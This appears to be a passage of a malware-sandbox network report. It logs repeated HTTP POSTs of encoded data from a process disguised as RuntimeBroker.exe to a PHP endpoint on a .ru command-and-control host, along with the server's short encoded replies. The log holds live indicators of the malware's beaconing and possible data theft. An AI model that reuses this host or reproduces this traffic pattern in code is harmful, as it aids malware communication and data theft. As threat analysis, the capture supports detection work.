                                                                                                                          11192.168.2.449747104.21.38.84808128C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 1, 2025 04:22:13.903176069 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                          Host: 891781cm.renyash.ru
                                                                                                                          Content-Length: 1056
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Jan 1, 2025 04:22:14.276365995 CET1056OUTData Raw: 55 54 58 5d 5f 5d 51 5a 55 5a 54 59 51 53 55 52 58 5c 5c 59 59 5c 52 5e 5d 5b 46 5d 56 5d 56 51 42 5a 55 53 5d 5f 52 5a 58 54 51 59 5d 54 51 5a 52 51 5f 58 43 5b 54 59 53 5a 56 5b 54 53 53 59 5f 52 5d 5e 58 45 5a 51 5a 5c 58 5f 5c 53 59 51 59 52
                                                                                                                          Data Ascii: UTX]_]QZUZTYQSURX\\YY\R^][F]V]VQBZUS]_RZXTQY]TQZRQ_XC[TYSZV[TSSY_R]^XEZQZ\X_\SYQYRZVVX\Y__XTX\QP[SX]X[FTTQ^^YZ\S\_PW_]Z]XXQQW[ZXZQ_VY^\X\X[Q_BXVZ[VTUVUAC]Y]V^YQFP_B\XTSPCU^V_TQF[Z]ZYSZ ^)/.#!^%)>Y3$.-$#'?5$+X;7?0(,#^!'^)
                                                                                                                          Jan 1, 2025 04:22:14.343534946 CET25INHTTP/1.1 100 Continue
                                                                                                                          Jan 1, 2025 04:22:14.627593040 CET805INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 01 Jan 2025 03:22:14 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: keep-alive
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lNccJEfcotqLtu54TYNDRpNqoYD7%2BsS07ZHtjAGn62clrzhVqXSxh9WJwV9g%2FVsHS6H5fOfwOA6JUbKGYzABxyHDdmweDvfaNVlgo3%2FoaYuf2B3Bqcoxxs2EiwIHvMss0gGnQIWI"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8faf623f68d542f1-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3055&min_rtt=1688&rtt_var=3367&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1400&delivery_rate=115652&cwnd=209&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 41V[X0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          12192.168.2.449749104.21.38.84808128C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 1, 2025 04:22:14.777556896 CET320OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                          Host: 891781cm.renyash.ru
                                                                                                                          Content-Length: 1056
                                                                                                                          Expect: 100-continue
                                                                                                                          Jan 1, 2025 04:22:15.131360054 CET1056OUTData Raw: 55 50 58 55 5a 58 51 5a 55 5a 54 59 51 5d 55 54 58 53 5c 5d 59 53 52 5e 5d 5b 46 5d 56 5d 56 51 42 5a 55 53 5d 5f 52 5a 58 54 51 59 5d 54 51 5a 52 51 5f 58 43 5b 54 59 53 5a 56 5b 54 53 53 59 5f 52 5d 5e 58 45 5a 51 5a 5c 58 5f 5c 53 59 51 59 52
                                                                                                                          Data Ascii: UPXUZXQZUZTYQ]UTXS\]YSR^][F]V]VQBZUS]_RZXTQY]TQZRQ_XC[TYSZV[TSSY_R]^XEZQZ\X_\SYQYRZVVX\Y__XTX\QP[SX]X[FTTQ^^YZ\S\_PW_]Z]XXQQW[ZXZQ_VY^\X\X[Q_BXVZ[VTUVUAC]Y]V^YQFP_B\XTSPCU^V_TQF[Z]ZYSZ _?"4%Z%X5*-#0-:B4$/53$8$+X$(,#^!'^)?
                                                                                                                          Jan 1, 2025 04:22:15.239377975 CET25INHTTP/1.1 100 Continue
                                                                                                                          Jan 1, 2025 04:22:15.503364086 CET804INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 01 Jan 2025 03:22:15 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: keep-alive
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2F2GWZkqVQXVgvyvxjVzIwHxJKmqBl8ugKM7hjIIQeyYol6ncYfZJQmaFlVIAh1oBKFcJNubUr1mAY%2BduJNwUH1eY5NbRhxTGcatR3cJ7UxmbOfamDntUwaAfkQ8tQdRl%2BsHzPv4l"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8faf6244fce38c5d-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=4909&min_rtt=2034&rtt_var=6513&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1376&delivery_rate=58313&cwnd=210&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 41V[X0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          13192.168.2.449752104.21.38.84808128C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 1, 2025 04:22:15.656730890 CET320OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                          Host: 891781cm.renyash.ru
                                                                                                                          Content-Length: 1056
                                                                                                                          Expect: 100-continue
                                                                                                                          Jan 1, 2025 04:22:16.007417917 CET1056OUTData Raw: 55 56 58 57 5a 58 51 54 55 5a 54 59 51 5e 55 51 58 5f 5c 5b 59 51 52 5e 5d 5b 46 5d 56 5d 56 51 42 5a 55 53 5d 5f 52 5a 58 54 51 59 5d 54 51 5a 52 51 5f 58 43 5b 54 59 53 5a 56 5b 54 53 53 59 5f 52 5d 5e 58 45 5a 51 5a 5c 58 5f 5c 53 59 51 59 52
                                                                                                                          Data Ascii: UVXWZXQTUZTYQ^UQX_\[YQR^][F]V]VQBZUS]_RZXTQY]TQZRQ_XC[TYSZV[TSSY_R]^XEZQZ\X_\SYQYRZVVX\Y__XTX\QP[SX]X[FTTQ^^YZ\S\_PW_]Z]XXQQW[ZXZQ_VY^\X\X[Q_BXVZ[VTUVUAC]Y]V^YQFP_B\XTSPCU^V_TQF[Z]ZYSZ#(,6 +*1.>)-3_'$2-43?>V0</=(++*#^!'^)3
                                                                                                                          Jan 1, 2025 04:22:16.131815910 CET25INHTTP/1.1 100 Continue
                                                                                                                          Jan 1, 2025 04:22:16.394018888 CET816INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 01 Jan 2025 03:22:16 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: keep-alive
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2B8Wlf6P6ZMlDoapHkN%2BHawH4S6T%2BolPkvX%2Bm2ug6Lbsp%2BDubm4PHVEEsA4PoKI%2BsxJsi7x91AjPzotWSF0gOHK3yiOa%2FkGDBnc8DaJTBNRAclxRjkndh67j%2BEvmTNkHZ5p%2FjMJcy"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8faf624a8c7178d6-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=4912&min_rtt=1984&rtt_var=6600&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1376&delivery_rate=57459&cwnd=146&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 41V[X0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          14192.168.2.449754104.21.38.84808128C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 1, 2025 04:22:16.551704884 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                          Host: 891781cm.renyash.ru
                                                                                                                          Content-Length: 1056
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Jan 1, 2025 04:22:16.896729946 CET1056OUTData Raw: 55 5e 58 5c 5a 5b 54 5d 55 5a 54 59 51 5e 55 52 58 5b 5c 54 59 53 52 5c 5d 5b 46 5d 56 5d 56 51 42 5a 55 53 5d 5f 52 5a 58 54 51 59 5d 54 51 5a 52 51 5f 58 43 5b 54 59 53 5a 56 5b 54 53 53 59 5f 52 5d 5e 58 45 5a 51 5a 5c 58 5f 5c 53 59 51 59 52
                                                                                                                          Data Ascii: U^X\Z[T]UZTYQ^URX[\TYSR\][F]V]VQBZUS]_RZXTQY]TQZRQ_XC[TYSZV[TSSY_R]^XEZQZ\X_\SYQYRZVVX\Y__XTX\QP[SX]X[FTTQ^^YZ\S\_PW_]Z]XXQQW[ZXZQ_VY^\X\X[Q_BXVZ[VTUVUAC]Y]V^YQFP_B\XTSPCU^V_TQF[Z]ZYSZ (/" &2=!X>=0&4,' ^%<*$<+/7?7*,#^!'^)3
                                                                                                                          Jan 1, 2025 04:22:17.177922964 CET25INHTTP/1.1 100 Continue
                                                                                                                          Jan 1, 2025 04:22:17.211767912 CET25INHTTP/1.1 100 Continue
                                                                                                                          Jan 1, 2025 04:22:17.260894060 CET804INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 01 Jan 2025 03:22:17 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: keep-alive
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PX0DjkNU0Vb8SzXHbyxO3pK665DulD96MExXj5iQNKVIv4Aj7HMoAi57WVf4qMC13Pss%2B%2BEgvVNa8tpPH70tjd7rw8o%2BtRMrIwsxAI3hAdq04rKzJCBT7QGNlsQ4qVDysFD9lc86"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8faf624fface43b3-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3808&min_rtt=1742&rtt_var=4786&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1400&delivery_rate=79899&cwnd=202&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 41V[X0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          15192.168.2.449756104.21.38.84808128C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 1, 2025 04:22:17.385888100 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                          Host: 891781cm.renyash.ru
                                                                                                                          Content-Length: 1048
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Jan 1, 2025 04:22:17.740489006 CET1048OUTData Raw: 55 57 5d 51 5a 58 54 58 55 5a 54 59 51 5b 55 51 58 59 5c 58 59 54 52 52 5d 5b 46 5d 56 5d 56 51 42 5a 55 53 5d 5f 52 5a 58 54 51 59 5d 54 51 5a 52 51 5f 58 43 5b 54 59 53 5a 56 5b 54 53 53 59 5f 52 5d 5e 58 45 5a 51 5a 5c 58 5f 5c 53 59 51 59 52
                                                                                                                          Data Ascii: UW]QZXTXUZTYQ[UQXY\XYTRR][F]V]VQBZUS]_RZXTQY]TQZRQ_XC[TYSZV[TSSY_R]^XEZQZ\X_\SYQYRZVVX\Y__XTX\QP[SX]X[FTTQ^^YZ\S\_PW_]Z]XXQQW[ZXZQ_VY^\X\X[Q_BXVZ[VTUVUAC]Y]V^YQFP_B\XTSPCU^V_TQF[Z]ZYSZ#+-Y!;%X9X(>4&$1-$3.$,Z,= \(-#(,#^!'^)7
                                                                                                                          Jan 1, 2025 04:22:17.857883930 CET25INHTTP/1.1 100 Continue
                                                                                                                          Jan 1, 2025 04:22:18.120718956 CET810INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 01 Jan 2025 03:22:18 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: keep-alive
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jBWSDoQPQ4cleKy%2F2bRk051vOUgyTWxvhsnt7irkKM%2Bi%2BY2c58XBOsulGyhR6%2FKQIec5uaQTO7nTZKeVyLjj9NbeZ1kvpCKKQ71lOS4JMDDVHTH6n69sRO5KJM5Jqco7kA%2F6RI%2By"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8faf62554fb52395-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=4284&min_rtt=2046&rtt_var=5243&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1392&delivery_rate=73179&cwnd=138&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 41V[X0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          16192.168.2.449757104.21.38.84808128C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 1, 2025 04:22:18.245671034 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                          Host: 891781cm.renyash.ru
                                                                                                                          Content-Length: 1056
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Jan 1, 2025 04:22:18.599764109 CET1056OUTData Raw: 50 56 58 54 5f 5d 51 54 55 5a 54 59 51 5f 55 54 58 58 5c 5a 59 57 52 53 5d 5b 46 5d 56 5d 56 51 42 5a 55 53 5d 5f 52 5a 58 54 51 59 5d 54 51 5a 52 51 5f 58 43 5b 54 59 53 5a 56 5b 54 53 53 59 5f 52 5d 5e 58 45 5a 51 5a 5c 58 5f 5c 53 59 51 59 52
                                                                                                                          Data Ascii: PVXT_]QTUZTYQ_UTXX\ZYWRS][F]V]VQBZUS]_RZXTQY]TQZRQ_XC[TYSZV[TSSY_R]^XEZQZ\X_\SYQYRZVVX\Y__XTX\QP[SX]X[FTTQ^^YZ\S\_PW_]Z]XXQQW[ZXZQ_VY^\X\X[Q_BXVZ[VTUVUAC]Y]V^YQFP_B\XTSPCU^V_TQF[Z]ZYSZ ]+?&4)$.2).#_&4*U:'?$*Q3<'8=$^<-7(<#^!'^)7
                                                                                                                          Jan 1, 2025 04:22:18.690392017 CET25INHTTP/1.1 100 Continue
                                                                                                                          Jan 1, 2025 04:22:18.943169117 CET809INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 01 Jan 2025 03:22:18 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: keep-alive
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SjAZu2S%2Bkp8Mkcr0KigRihNIW5oRSwiLnAa0F19somkgm%2Flv%2FP5Iff69aFkBRThWNrNmY%2FGDgFrBZk7EecIDJc63220fu4GMIl9EgRV3N8Gs0KYp21Ro%2FljFmOIMZcJ1p0Tr1K3p"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8faf625a8e1c41af-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1951&min_rtt=1783&rtt_var=1005&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1400&delivery_rate=466751&cwnd=223&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 41V[X0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          17192.168.2.449758104.21.38.84808128C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 1, 2025 04:22:19.106295109 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                          Host: 891781cm.renyash.ru
                                                                                                                          Content-Length: 1056
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Jan 1, 2025 04:22:19.459146023 CET1056OUTData Raw: 55 51 58 54 5f 5c 54 5f 55 5a 54 59 51 5f 55 53 58 5d 5c 5f 59 51 52 5f 5d 5b 46 5d 56 5d 56 51 42 5a 55 53 5d 5f 52 5a 58 54 51 59 5d 54 51 5a 52 51 5f 58 43 5b 54 59 53 5a 56 5b 54 53 53 59 5f 52 5d 5e 58 45 5a 51 5a 5c 58 5f 5c 53 59 51 59 52
                                                                                                                          Data Ascii: UQXT_\T_UZTYQ_USX]\_YQR_][F]V]VQBZUS]_RZXTQY]TQZRQ_XC[TYSZV[TSSY_R]^XEZQZ\X_\SYQYRZVVX\Y__XTX\QP[SX]X[FTTQ^^YZ\S\_PW_]Z]XXQQW[ZXZQ_VY^\X\X[Q_BXVZ[VTUVUAC]Y]V^YQFP_B\XTSPCU^V_TQF[Z]ZYSZ Y?!8=%X)Z=,'&Q:B8^%/23<;;4_<X#*<#^!'^)7


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          18192.168.2.449759104.21.38.84808128C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 1, 2025 04:22:19.543462038 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                          Host: 891781cm.renyash.ru
                                                                                                                          Content-Length: 1780
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Jan 1, 2025 04:22:19.896672964 CET1780OUTData Raw: 55 51 58 56 5a 5c 51 54 55 5a 54 59 51 58 55 53 58 5d 5c 55 59 52 52 5a 5d 5b 46 5d 56 5d 56 51 42 5a 55 53 5d 5f 52 5a 58 54 51 59 5d 54 51 5a 52 51 5f 58 43 5b 54 59 53 5a 56 5b 54 53 53 59 5f 52 5d 5e 58 45 5a 51 5a 5c 58 5f 5c 53 59 51 59 52
                                                                                                                          Data Ascii: UQXVZ\QTUZTYQXUSX]\UYRRZ][F]V]VQBZUS]_RZXTQY]TQZRQ_XC[TYSZV[TSSY_R]^XEZQZ\X_\SYQYRZVVX\Y__XTX\QP[SX]X[FTTQ^^YZ\S\_PW_]Z]XXQQW[ZXZQ_VY^\X\X[Q_BXVZ[VTUVUAC]Y]V^YQFP_B\XTSPCU^V_TQF[Z]ZYSZ ?)\#%2Y=.002W:;01$,/_,>,\(-#*#^!'^)+
                                                                                                                          Jan 1, 2025 04:22:20.015840054 CET25INHTTP/1.1 100 Continue
                                                                                                                          Jan 1, 2025 04:22:20.283287048 CET956INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 01 Jan 2025 03:22:20 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: keep-alive
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=irJOhrUCtxO0L0rEa80rTNWW%2BYT7LXmKxMWWIqSfj5hqCNOjnepiDNSgJ42gvME30PCIINZQDfjpNA27D%2FGcXgv%2B8uZs11lwr2e2dKTYcpm7249S1xI4e7dChnGeaZ02RRmVre%2F0"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8faf6262c8cc7cae-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=7946&min_rtt=2010&rtt_var=12627&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2124&delivery_rate=29493&cwnd=194&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 39 38 0d 0a 03 1e 22 57 33 3b 09 16 3c 3e 25 05 2f 2f 37 12 26 11 04 59 30 09 2f 06 25 2e 26 01 2d 06 24 5d 2b 05 05 1d 26 3a 35 1c 37 32 3e 59 31 0c 2e 5d 04 1d 25 5d 2a 2a 3e 15 28 3f 2a 06 2a 32 20 5d 30 09 28 01 26 1d 27 05 24 3d 03 00 22 0c 3f 52 30 23 20 52 2a 3a 3c 02 24 13 26 57 20 3a 2e 57 0d 12 22 55 26 58 29 1e 29 1f 38 56 35 2f 27 11 24 11 37 54 33 2f 3c 50 23 28 3e 56 2a 3f 3c 58 22 09 0b 1d 30 29 23 12 22 07 39 5a 23 23 22 54 20 03 2f 54 05 3d 56 4f 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 98"W3;<>%//7&Y0/%.&-$]+&:572>Y1.]%]**>(?**2 ]0(&'$="?R0# R*:<$&W :.W"U&X))8V5/'$7T3/<P#(>V*?<X"0)#"9Z##"T /T=VO0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          19192.168.2.449760104.21.38.84808128C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 1, 2025 04:22:19.669387102 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                          Host: 891781cm.renyash.ru
                                                                                                                          Content-Length: 1056
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Jan 1, 2025 04:22:20.021750927 CET1056OUTData Raw: 55 52 5d 50 5f 5c 51 5c 55 5a 54 59 51 53 55 5d 58 5f 5c 5b 59 53 52 58 5d 5b 46 5d 56 5d 56 51 42 5a 55 53 5d 5f 52 5a 58 54 51 59 5d 54 51 5a 52 51 5f 58 43 5b 54 59 53 5a 56 5b 54 53 53 59 5f 52 5d 5e 58 45 5a 51 5a 5c 58 5f 5c 53 59 51 59 52
                                                                                                                          Data Ascii: UR]P_\Q\UZTYQSU]X_\[YSRX][F]V]VQBZUS]_RZXTQY]TQZRQ_XC[TYSZV[TSSY_R]^XEZQZ\X_\SYQYRZVVX\Y__XTX\QP[SX]X[FTTQ^^YZ\S\_PW_]Z]XXQQW[ZXZQ_VY^\X\X[Q_BXVZ[VTUVUAC]Y]V^YQFP_B\XTSPCU^V_TQF[Z]ZYSZ Y)<1Y#81&-%*.0..<]06'<0,X4Z+U*<#^!'^)
                                                                                                                          Jan 1, 2025 04:22:20.116652012 CET25INHTTP/1.1 100 Continue
                                                                                                                          Jan 1, 2025 04:22:20.389399052 CET808INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 01 Jan 2025 03:22:20 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: keep-alive
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IOoao0v2e4fErrB2P%2BUJa3%2BnFBkJJne6o0IvXzAQW78KvDV91pGNJuSLr8aiAjjpnyKmu6I03vkdzMl%2Fr1B6RD5zmtQmNYgZN4YZJQoxDpVXRVc%2Fpf%2FOkqU8S1OosjjzwhU6jWIc"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8faf62637bf743ff-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=4083&min_rtt=1598&rtt_var=5570&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1400&delivery_rate=67967&cwnd=215&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 41V[X0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          20192.168.2.449761104.21.38.84808128C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 1, 2025 04:22:20.512075901 CET320OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                          Host: 891781cm.renyash.ru
                                                                                                                          Content-Length: 1056
                                                                                                                          Expect: 100-continue
                                                                                                                          Jan 1, 2025 04:22:20.865442038 CET1056OUTData Raw: 50 55 5d 53 5a 58 51 54 55 5a 54 59 51 58 55 53 58 5e 5c 5f 59 50 52 5f 5d 5b 46 5d 56 5d 56 51 42 5a 55 53 5d 5f 52 5a 58 54 51 59 5d 54 51 5a 52 51 5f 58 43 5b 54 59 53 5a 56 5b 54 53 53 59 5f 52 5d 5e 58 45 5a 51 5a 5c 58 5f 5c 53 59 51 59 52
